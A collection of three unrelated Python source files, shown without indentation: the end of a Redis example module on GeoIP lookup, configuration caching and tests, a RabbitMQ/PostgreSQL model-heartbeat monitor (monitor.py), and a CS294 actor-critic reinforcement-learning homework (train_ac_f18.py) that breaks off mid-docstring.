city_id = row[2] + '_' + str(count) # D
conn.zadd('ip2cityid:', {city_id: start_ip}) # E
# <end id="_1314_14473_9191"/>
# A Should be run with the location of the GeoLiteCity-Blocks.csv file
# B Convert the IP address to a score as necessary
# C Header row or malformed entry
# D Construct the unique city id
# E Add the IP address score and City ID
# END
# <start id="_1314_14473_9194"/>
def import_cities_to_redis(conn, filename): # A
for row in csv.reader(open(filename, 'rb')):
if len(row) < 4 or not row[0].isdigit():
continue
row = [i.decode('latin-1') for i in row]
city_id = row[0] # B
country = row[1] # B
region = row[2] # B
city = row[3] # B
conn.hset('cityid2city:', city_id, # C
json.dumps([city, region, country])) # C
# <end id="_1314_14473_9194"/>
# A Should be run with the location of the GeoLiteCity-Location.csv file
# B Prepare the information for adding to the hash
# C Actually add the city information to Redis
# END
# <start id="_1314_14473_9197"/>
def find_city_by_ip(conn, ip_address):
if isinstance(ip_address, str): # A
ip_address = ip_to_score(ip_address) # A
city_id = conn.zrevrangebyscore( # B
'ip2cityid:', ip_address, 0, start=0, num=1) # B
if not city_id:
return None
city_id = city_id[0].partition('_')[0] # C
return json.loads(conn.hget('cityid2city:', city_id)) # D
# <end id="_1314_14473_9197"/>
# A Convert the IP address to a score for zrevrangebyscore
# B Find the uique city ID
# C Convert the unique city ID to the common city ID
# D Fetch the city information from the hash
# END
# <start id="is_under_maintenance"/>
LAST_CHECKED = None
IS_UNDER_MAINTENANCE = False
def is_under_maintenance(conn):
global LAST_CHECKED, IS_UNDER_MAINTENANCE # A
if (not LAST_CHECKED) or LAST_CHECKED < time.time() - 1: # B
LAST_CHECKED = time.time() # C
IS_UNDER_MAINTENANCE = bool( # D
conn.get('is-under-maintenance')) # D
return IS_UNDER_MAINTENANCE # E
# <end id="is_under_maintenance"/>
# A Set the two variables as globals so we can write to them later
# B Check to see if it has been at least 1 second since we last checked
# C Update the last checked time
# D Find out whether the system is under maintenance
# E Return whether the system is under maintenance
# END
# <start id="set_config"/>
def set_config(conn, type, component, config):
conn.set(
'config:%s:%s' % (type, component),
json.dumps(config))
# <end id="set_config"/>
# END
# <start id="get_config"/>
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s' % (type, component)
ch = CHECKED.get(key)
if (not ch) or ch < time.time() - wait: # A
CHECKED[key] = time.time() # B
config = json.loads(conn.get(key) or '{}') # C
config = dict((str(k), config[k]) for k in config) # G
old_config = CONFIGS.get(key) # D
if config != old_config: # E
CONFIGS[key] = config # F
return CONFIGS.get(key)
# <end id="get_config"/>
# A Check to see if we should update the configuration information about this component
# B We can, so update the last time we checked this connection
# C Fetch the configuration for this component
# G Convert potentially unicode keyword arguments into string keyword arguments
# D Get the old configuration for this component
# E If the configurations are different
# F Update the configuration
# END
# <start id="redis_connection"/>
REDIS_CONNECTIONS = {}
def redis_connection(component, wait=1): # A
key = 'config:redis:' + component # B
def wrapper(function): # C
@functools.wraps(function) # D
def call(*args, **kwargs): # E
old_config = CONFIGS.get(key, object()) # F
config = get_config( # G
config_connection, 'redis', component, wait) # G
if config != old_config: # H
REDIS_CONNECTIONS[key] = redis.Redis(**config) # H
return function( # I
REDIS_CONNECTIONS.get(key), *args, **kwargs) # I
return call # J
return wrapper # K
# <end id="redis_connection"/>
# A We pass the name of the application component to the decorator
# B We cache the configuration key because we will be fetching it every time the function is called
# C Our wrapper takes a function that it wraps with another function
# D Copy some useful metadata from the original function to the configuration handler
# E Create the actual function that will be managing connection information
# F Fetch the old configuration, if any
# G Get the new configuration, if any
# L Make the configuration usable for creating a Redis connection
# H If the new and old configuration do not match, create a new connection
# I Call and return the result of our wrapped function, remembering to pass the connection and the other matched arguments
# J Return the fully wrapped function
# K Return a function that can wrap our Redis function
# END
'''
# <start id="recent_log_decorator"/>
@redis_connection('logs') #A
def log_recent(conn, app, message): #B
'the old log_recent() code'
log_recent('main', 'User 235 logged in') #C
# <end id="recent_log_decorator"/>
#A The redis_connection() decorator is very easy to use
#B The function definition doesn't change
#C You no longer need to worry about passing the log server connection when calling log_recent()
#END
'''
# --------------- Below this line are helpers to test the code ----------------
class request:
pass
# a faster version with pipelines for actual testing
def import_ips_to_redis(conn, filename):
csv_file = csv.reader(open(filename, 'rb'))
pipe = conn.pipeline(False)
for count, row in enumerate(csv_file):
start_ip = row[0] if row else ''
if 'i' in start_ip.lower():
continue
if '.' in start_ip:
start_ip = ip_to_score(start_ip)
elif start_ip.isdigit():
start_ip = int(start_ip, 10)
else:
continue
city_id = row[2] + '_' + str(count)
pipe.zadd('ip2cityid:', {city_id: start_ip})
if not (count + 1) % 1000:
pipe.execute()
pipe.execute()
def import_cities_to_redis(conn, filename):
pipe = conn.pipeline(False)
for count, row in enumerate(csv.reader(open(filename, 'rb'))):
if len(row) < 4 or not row[0].isdigit():
continue
row = [i.decode('latin-1') for i in row]
city_id = row[0]
country = row[1]
region = row[2]
city = row[3]
pipe.hset('cityid2city:', city_id,
json.dumps([city, region, country]))
if not (count + 1) % 1000:
pipe.execute()
pipe.execute()
class TestCh05(unittest.TestCase):
def setUp(self):
global config_connection
import redis
self.conn = config_connection = redis.Redis(db=15)
self.conn.flushdb()
def tearDown(self):
self.conn.flushdb()
del self.conn
global config_connection, QUIT, SAMPLE_COUNT
config_connection = None
QUIT = False
SAMPLE_COUNT = 100
print()
print()
def test_log_recent(self):
import pprint
conn = self.conn
print("Let's write a few logs to the recent log")
for msg in range(5):
log_recent(conn, 'test', 'this is message %s' % msg)
recent = conn.lrange('recent:test:info', 0, -1)
print("The current recent message log has this many messages:", len(recent))
print("Those messages include:")
pprint.pprint(recent[:10])
self.assertTrue(len(recent) >= 5)
def test_log_common(self):
import pprint
conn = self.conn
print("Let's write some items to the common log")
for count in range(1, 6):
for i in range(count):
log_common(conn, 'test', "message-%s" % count)
common = conn.zrevrange('common:test:info', 0, -1, withscores=True)
print("The current number of common messages is:", len(common))
print("Those common messages are:")
pprint.pprint(common)
self.assertTrue(len(common) >= 5)
def test_counters(self):
import pprint
global QUIT, SAMPLE_COUNT
conn = self.conn
print("Let's update some counters for now and a little in the future")
now = time.time()
for delta in range(10):
update_counter(conn, 'test', count=random.randrange(1, 5), now=now + delta)
counter = get_counter(conn, 'test', 1)
print("We have some per-second counters:", len(counter))
self.assertTrue(len(counter) >= 10)
counter = get_counter(conn, 'test', 5)
print("We have some per-5-second counters:", len(counter))
print("These counters include:")
pprint.pprint(counter[:10])
self.assertTrue(len(counter) >= 2)
print()
tt = time.time
def new_tt():
return tt() + 2 * 86400
time.time = new_tt
print("Let's clean out some counters by setting our sample count to 0")
SAMPLE_COUNT = 0
t = threading.Thread(target=clean_counters, args=(conn,))
t.setDaemon(1) # to make sure it dies if we ctrl+C quit
t.start()
time.sleep(1)
QUIT = True
time.time = tt
counter = get_counter(conn, 'test', 86400)
print("Did we clean out all of the counters?", not counter)
self.assertFalse(counter)
def test_stats(self):
import pprint
conn = self.conn
print("Let's add some data for our statistics!")
for i in range(5):
r = update_stats(conn, 'temp', 'example', random.randrange(5, 15))
print("We have some aggregate statistics:", r)
rr = get_stats(conn, 'temp', 'example')
print("Which we can also fetch manually:")
pprint.pprint(rr)
self.assertTrue(rr[b'count'] >= 5)
def test_access_time(self):
import pprint
conn = self.conn
print("Let's calculate some access times...")
for i in range(10):
with access_time(conn, "req-%s" % i):
time.sleep(.5 + random.random())
print("The slowest access times are:")
atimes = conn.zrevrange('slowest:AccessTime', 0, -1, withscores=True)
pprint.pprint(atimes[:10])
self.assertTrue(len(atimes) >= 10)
print()
def cb():
time.sleep(1 + random.random())
print("Let's use the callback version...")
for i in range(5):
request.path = 'cbreq-%s' % i
process_view(conn, cb)
print("The slowest access times are:")
atimes = conn.zrevrange('slowest:AccessTime', 0, -1, withscores=True)
pprint.pprint(atimes[:10])
self.assertTrue(len(atimes) >= 10)
def test_ip_lookup(self):
conn = self.conn
try:
open('GeoLiteCity-Blocks.csv', 'rb')
open('GeoLiteCity-Location.csv', 'rb')
except:
print("********")
print("You do not have the GeoLiteCity database available, aborting test")
print("Please have the following two files in the current path:")
print("GeoLiteCity-Blocks.csv")
print("GeoLiteCity-Location.csv")
print("********")
return
print("Importing IP addresses to Redis... (this may take a while)")
import_ips_to_redis(conn, 'GeoLiteCity-Blocks.csv')
ranges = conn.zcard('ip2cityid:')
print("Loaded ranges into Redis:", ranges)
self.assertTrue(ranges > 1000)
print()
print("Importing Location lookups to Redis... (this may take a while)")
import_cities_to_redis(conn, 'GeoLiteCity-Location.csv')
cities = conn.hlen('cityid2city:')
print("Loaded city lookups into Redis:", cities)
self.assertTrue(cities > 1000)
print()
print("Let's lookup some locations!")
rr = random.randrange
for i in range(5):
print(find_city_by_ip(conn, '%s.%s.%s.%s' % (rr(1, 255), rr(256), rr(256), rr(256))))
def test_is_under_maintenance(self):
print("Are we under maintenance (we shouldn't be)?", is_under_maintenance(self.conn))
self.conn.set('is-under-maintenance', 'yes')
print("We cached this, so it should be the same:", is_under_maintenance(self.conn))
time.sleep(1)
print("But after a sleep, it should change:", is_under_maintenance(self.conn))
print("Cleaning up...")
self.conn.delete('is-under-maintenance')
time.sleep(1)
print("Should be False again:", is_under_maintenance(self.conn))
def test_config(self):
print("Let's set a config and then get a connection from that config...")
set_config(self.conn, 'redis', 'test', {'db': 15})
@redis_connection('test')
def test(conn2):
return bool(conn2.info())
print("We can run commands from the configured connection:", test())
if __name__ == '__main__':
unittest.main()
|
monitor.py
|
#!/usr/bin/env python
import datetime
import dateutil.parser
import http.server
import json
import logging
import os
import threading
import time
import urllib.parse
import pika
import psycopg2
import requests
# parameters to connect to RabbitMQ
rabbitmq_uri = os.getenv('RABBITMQ_URI', 'amqp://guest:guest@localhost/%2F')
rabbitmq_mgmt_port = os.getenv('RABBITMQ_MGMT_PORT', '15672')
rabbitmq_mgmt_path = os.getenv('RABBITMQ_MGMT_PATH', '/')
rabbitmq_mgmt_url = os.getenv('RABBITMQ_MGMT_URL', '')
rabbitmq_username = None
rabbitmq_password = None
# parameters to connect to BETY database
postgres_host = os.getenv('PGHOST', 'postgres')
postgres_port = os.getenv('PGPORT', '5432')
postgres_user = os.getenv('BETYUSER', 'bety')
postgres_password = os.getenv('BETYPASSWORD', 'bety')
postgres_database = os.getenv('BETYDATABASE', 'bety')
postgres_uri = None
# name of host when registering the model
pecan_fqdn = os.getenv('FQDN', 'docker')
# list of all models.
models = {}
# frequency with which the counts of the queue is updated in seconds
update_frequency = 60
# number of seconds before a consumer is removed
remove_model_timout = 15 * 60
# ----------------------------------------------------------------------
# WEB SERVER
# ----------------------------------------------------------------------
class MyServer(http.server.SimpleHTTPRequestHandler):
"""
Handles the responses from the web server. Only response that is
handled is a GET that will return all known models.
"""
def do_GET(self):
self.path = os.path.basename(self.path)
if self.path == '':
self.path = '/'
if self.path.startswith('models.json'):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes(json.dumps(models), 'utf-8'))
else:
super().do_GET()
def http_server(host_port=9999):
"""
Start a webserver to return all models that registered since this
application started.
"""
server = http.server.HTTPServer(("", host_port), MyServer)
try:
server.serve_forever()
finally:
server.server_close()
# ----------------------------------------------------------------------
# MESSAGES IN QUEUES
# ----------------------------------------------------------------------
def get_mgmt_queue_messages(queue):
"""
Get the number of messages waiting in the queue.
"""
global rabbitmq_username, rabbitmq_password, rabbitmq_mgmt_url
try:
response = requests.get(rabbitmq_mgmt_url + queue, auth=(rabbitmq_username, rabbitmq_password), timeout=5)
if response.status_code == 404:
# queue does not exist, so we assume 0 messages
return 0
response.raise_for_status()
return response.json()['messages']
except Exception:
logging.exception("Error getting list of messages in %s" % queue)
return 0
def keep_entry(consumer):
"""
Check to see if the last time the consumer was seen is more than timeout seconds.
"""
global remove_model_timout
now = datetime.datetime.now()
delta = now - dateutil.parser.parse(consumer['last_seen'])
return delta.total_seconds() < remove_model_timout
def update_counts():
"""
Contacts the RabbitMQ server and checks the number of jobs in the queue. It will
also clean up the list of consumers based on the last time a heartbeat was seen
from the consumer.
This will run continuously and should be run as a daemon thread.
"""
global models, update_frequency
while True:
try:
for versions in models.values():
for model in versions.values():
# use management api to get counts
waiting = get_mgmt_queue_messages(model['queue'])
model['messages'] = waiting
model['consumers'] = {k: v for k, v in model['consumers'].items() if keep_entry(v)}
except Exception:
logging.exception("ERROR")
time.sleep(update_frequency)
# ----------------------------------------------------------------------
# EXTRACTOR HEARTBEATS
# ----------------------------------------------------------------------
def insert_model(model_info):
"""
Insert the model info into the database. If the host, modeltype or
model does not exist it will be inserted in the database as well.
"""
global postgres_uri, postgres_host, postgres_port, postgres_database
global postgres_user, postgres_password
if not postgres_uri:
postgres_uri = "host=%s port=%s dbname=%s user=%s password=%s connect_timeout=10" % (
postgres_host, postgres_port, postgres_database, postgres_user, postgres_password
)
conn = None
try:
# connect to the PostgreSQL database
conn = psycopg2.connect(postgres_uri)
# make sure host exists
cur = conn.cursor()
cur.execute("SELECT id FROM machines WHERE hostname=%s", (pecan_fqdn,))
result = cur.fetchone()
cur.close()
if result:
host_id = result[0]
else:
logging.debug("Adding host")
cur = conn.cursor()
cur.execute('INSERT INTO machines (hostname) '
'VALUES (%s) RETURNING id', (pecan_fqdn, ))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert host.")
return
host_id = result[0]
logging.debug("Found hostname for %s == %d" % (pecan_fqdn, host_id))
# Make sure modeltype exists
cur = conn.cursor()
cur.execute("SELECT id FROM modeltypes WHERE name=%s", (model_info['type'],))
result = cur.fetchone()
cur.close()
if result:
model_type_id = result[0]
else:
logging.debug("Adding modeltype")
cur = conn.cursor()
cur.execute('INSERT INTO modeltypes (name) '
'VALUES (%s) RETURNING id', (model_info['type']))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert modeltypes.")
return
model_type_id = result[0]
logging.debug("Found modeltype for %s == %d" % (model_info['type'], model_type_id))
# Make sure model exists
cur = conn.cursor()
cur.execute("SELECT id FROM models WHERE model_name=%s AND modeltype_id=%s AND revision=%s",
(model_info['name'], model_type_id, model_info['version']))
result = cur.fetchone()
cur.close()
if result:
model_id = result[0]
else:
logging.debug("Adding model")
cur = conn.cursor()
cur.execute('INSERT INTO models (model_name, modeltype_id, revision) '
'VALUES (%s, %s, %s) RETURNING id',
(model_info['name'], model_type_id, model_info['version']))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert model.")
return
model_id = result[0]
logging.debug("Found model for %s %s (%s) == %d" %
(model_info['name'], model_info['type'], model_info['version'], model_id))
# check if binary already added
cur = conn.cursor()
cur.execute("SELECT id FROM dbfiles "
"WHERE container_type='Model' AND container_id=%s "
"AND file_name=%s AND file_path=%s and machine_id=%s",
(model_id, os.path.basename(model_info['binary']), os.path.dirname(model_info['binary']), host_id))
result = cur.fetchone()
cur.close()
if result:
dbfile_id = result[0]
else:
logging.debug("Adding model binary")
cur = conn.cursor()
cur.execute("INSERT INTO dbfiles (container_type, container_id, file_name, file_path,"
" machine_id)"
" VALUES ('Model', %s, %s, %s, %s) RETURNING id",
(model_id, os.path.basename(model_info['binary']),
os.path.dirname(model_info['binary']), host_id))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert model binary.")
return
dbfile_id = result[0]
logging.debug("Found model binary for %s %s (%s) on %s == %d" %
(model_info['name'], model_info['type'], model_info['version'], pecan_fqdn, dbfile_id))
# commit all changes to the database
conn.commit()
except (Exception, psycopg2.DatabaseError):
logging.exception("Error adding model to database")
finally:
if conn is not None:
conn.close()
def callback(ch, method, properties, body):
"""
A heartbeat of a model is received. Register the model with the database.
"""
global models
data = json.loads(body.decode('utf-8'))
data['updated'] = datetime.datetime.now().isoformat()
if 'id' not in data and 'model_info' not in data and 'queue' not in data:
logging.error("missing fields in json : %r " % body)
return
model_info = data['model_info']
if model_info['type'] not in models:
models[model_info['type']] = {}
if model_info['version'] not in models[model_info['type']]:
insert_model(model_info)
waiting = get_mgmt_queue_messages(data['queue'])
models[model_info['type']][model_info['version']] = {
'model_info': model_info,
'queue': data['queue'],
'messages': waiting,
'consumers': {}
}
model = models[model_info['type']][model_info['version']]
model['consumers'][data['id']] = {
'hostname': data['hostname'],
'last_seen': datetime.datetime.now().isoformat(),
}
if model['queue'] != data['queue']:
logging.error("mismatched queue names %s != %s." % (data['queue'], model['queue']))
model['queue'] = data['queue']
def rabbitmq_monitor():
"""
Create a connection with RabbitMQ and wait for heartbeats. This
will run continuously. This will run as the main thread. If this
is stopped the appliation will stop.
"""
global rabbitmq_mgmt_url, rabbitmq_mgmt_port, rabbitmq_mgmt_path, rabbitmq_username, rabbitmq_password
params = pika.URLParameters(rabbitmq_uri)
connection = pika.BlockingConnection(params)
# create management url
if not rabbitmq_mgmt_url:
if params.ssl_options:
rabbitmq_mgmt_protocol = 'https://'
else:
rabbitmq_mgmt_protocol = 'http://'
rabbitmq_mgmt_url = "%s%s:%s%sapi/queues/%s/" % (rabbitmq_mgmt_protocol, params.host, rabbitmq_mgmt_port,
rabbitmq_mgmt_path,
urllib.parse.quote_plus(params.virtual_host))
rabbitmq_username = params.credentials.username
rabbitmq_password = params.credentials.password
# connect to channel
channel = connection.channel()
# create models exchange for fanout
channel.exchange_declare(exchange='models', exchange_type='fanout', durable=True)
# create anonymous queue
result = channel.queue_declare('', exclusive=True)
channel.queue_bind(exchange='models', queue=result.method.queue)
# listen for messages
channel.basic_consume(on_message_callback=callback, queue=result.method.queue, auto_ack=True)
channel.start_consuming()
# ----------------------------------------------------------------------
# MAIN
# ----------------------------------------------------------------------
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s :'
' %(name)s - %(message)s',
level=logging.INFO)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)
thread = threading.Thread(target=http_server)
thread.setDaemon(True)
thread.start()
thread = threading.Thread(target=update_counts)
thread.setDaemon(True)
thread.start()
rabbitmq_monitor()
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
output_placeholder = input_placeholder
for l_num in range(n_layers):
layer = tf.layers.Dense(units = size, activation = activation)
output_placeholder = layer(output_placeholder)
layer = tf.layers.Dense(units = output_size, activation = output_activation)
output_placeholder = layer(output_placeholder)
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'Theta-discrete', self.n_layers, self.size)
return sy_logits_na
else:
with tf.variable_scope('Theta-contin') as scope:
sy_mean = build_mlp(sy_ob_no, self.ac_dim, scope, self.n_layers, self.size)
sy_logstd = tf.get_variable("log_std", shape=(self.ac_dim,))
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.random.categorical(logits = sy_logits_na, num_samples =1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.math.exp(sy_logstd) * tf.random.normal(shape = tf.shape(sy_mean))
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_logprob_n = tf.math.log(1e-8 + tf.gather_nd(tf.nn.softmax(logits=sy_logits_na),
tf.stack([tf.range(tf.shape(sy_logits_na)[0]), sy_ac_na], axis=1)))
else:
sy_mean, sy_logstd = policy_parameters
mvn = tfp.distributions.MultivariateNormalDiag(loc = sy_mean, scale_diag= tf.math.exp(sy_logstd))
sy_logprob_n =mvn.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.sess.run(self.sy_sampled_ac, {self.sy_ob_no : ob[None,:]})
if self.discrete:
ac = ac[0].item()
else:
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
next_obs.append(ob)
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
v_n = self.sess.run(self.critic_prediction, {self.sy_ob_no : ob_no})
vtp1_n = self.sess.run(self.critic_prediction, {self.sy_ob_no : next_ob_no})
q_n = re_n + self.gamma * vtp1_n * (1 - terminal_n)
adv_n = q_n - v_n
if self.normalize_advantages:
adv_n = (adv_n - np.mean(adv_n))/(np.std(adv_n) + 1e-8)
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
# Use a bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
for _ in range(self.num_target_updates):
vtp1_n = self.sess.run(self.critic_prediction, {self.sy_ob_no : next_ob_no})
target_n = re_n + self.gamma * vtp1_n * (1 - terminal_n)
for i in range(self.num_grad_steps_per_target_update):
self.sess.run(self.critic_update_op, {self.sy_target_n : target_n, self.sy_ob_no : ob_no})
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
